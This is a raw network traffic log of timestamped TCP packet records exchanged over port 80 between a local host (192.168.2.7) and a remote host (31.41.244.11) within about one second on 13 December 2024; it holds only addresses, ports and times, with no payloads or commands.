Dec 13, 2024 18:53:52.165196896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.165254116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.284585953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.284652948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.284658909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.284710884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.288752079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.288810015 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.288877964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.288929939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.356744051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.356805086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.357775927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.357832909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.361069918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.361107111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.361134052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.361164093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.369632959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.369646072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.369689941 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.369690895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.378046036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.378098011 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.378120899 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.378148079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.386473894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.386509895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.386531115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.386559963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.394938946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.395014048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.395103931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.395159006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.403420925 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.403506994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.403598070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.403650045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.412038088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.412089109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.412103891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.412147045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.420440912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.420479059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.420505047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.420536995 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.428908110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.428944111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.428971052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.428997993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.436131001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.436167002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.436196089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.436228037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.443548918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.443603039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.443603992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.443653107 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.548896074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.548963070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.548985958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.549041986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.551290035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.551351070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.551358938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.551414013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.555756092 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.555792093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.555810928 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.555838108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.560481071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.560516119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.560539961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.560573101 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.564804077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.564840078 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.564857960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.564888000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.569267988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.569327116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.569416046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.569473028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.573832989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.573889017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.573899031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.573950052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.578257084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.578319073 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.578353882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.578403950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.582916021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.582951069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.582994938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.582994938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.587424994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.587497950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.587582111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.587639093 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.592161894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.592197895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.592226982 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.592259884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.596319914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.596380949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.596506119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.596558094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.601214886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.601249933 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.601272106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.601304054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.605443954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.605480909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.605509043 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.605540037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.609894037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.609949112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.609955072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.609999895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.614356041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.614429951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.614557981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.614614964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.618891001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.618946075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.618987083 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.619035959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.623471975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.623507977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.623528957 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.623558044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.627917051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.627969980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.628052950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.628103018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.632514000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.632550001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.632590055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.632590055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.636969090 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.637032032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.637115002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.637168884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.641443968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.641503096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.740730047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.740791082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.740897894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.740899086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.741919994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.741957903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.741982937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.742021084 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.745812893 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.745872021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.745887041 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.745930910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.749134064 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.749174118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.749200106 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.749232054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.752598047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.752662897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.752732992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.752801895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.756220102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.756283998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.756330967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.756382942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.759576082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.759679079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.759732008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.759782076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.762892008 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.762957096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.762981892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.763036966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.766292095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.766329050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.766347885 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.766379118 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.769485950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.769542933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.769893885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.769948959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.772660017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.772716999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.772783995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.772836924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.776221037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.776257992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.776276112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.776304960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.779186010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.779237986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.779381990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.779436111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.782349110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.782406092 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.782428980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.782480955 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.785799980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.785861969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.785914898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.785968065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.788836956 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.788894892 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.788963079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.789016962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.792077065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.792140961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.792196989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.792248964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.795299053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.795353889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.795378923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.795416117 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.798504114 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.798542023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.798588037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.798588991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.801748991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.801785946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.801805973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.801836967 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.805027962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.805064917 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.805089951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.805124044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.808186054 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.808243990 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.808301926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.808459997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.811393976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.811430931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.811454058 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.811481953 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.814595938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.814657927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.814743996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.814795971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.817799091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.817857981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.817919016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.817970991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.821110964 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.821146965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.821171045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.821203947 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.824361086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.824398994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.824420929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.824445009 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.827416897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.827475071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.827619076 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.827672005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.830708981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.830760002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.830846071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.830904007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.833920002 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.833977938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.834003925 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.834053993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.837186098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.837223053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.837244034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.837275028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.840784073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.840838909 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.932894945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.932967901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.932990074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.933047056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.933630943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.933691025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.933729887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.933789015 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.936283112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.936336994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.936351061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.936392069 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.938797951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.938859940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.938926935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.938987017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.941513062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.941548109 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.941576004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.941606045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.944005013 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.944051981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.944083929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.944108963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.946400881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.946460962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.946480989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.946530104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.948817015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.948873043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.948882103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.948925972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.951209068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.951266050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.951335907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.951405048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.953650951 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.953685999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.953706026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.953733921 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.956111908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.956146955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.956176996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.956208944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.958336115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.958373070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.958394051 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.958425045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.960479975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.960536003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.960585117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.960639954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.962759972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.962826014 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.962848902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.962910891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.964925051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.964982033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.965101957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.965156078 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.967108965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.967164040 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.967405081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.967459917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.969444990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.969479084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.969511032 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.969542980 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:52.971708059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:52.971741915 CET	80	49917	31.41.244.11	192.168.2.7
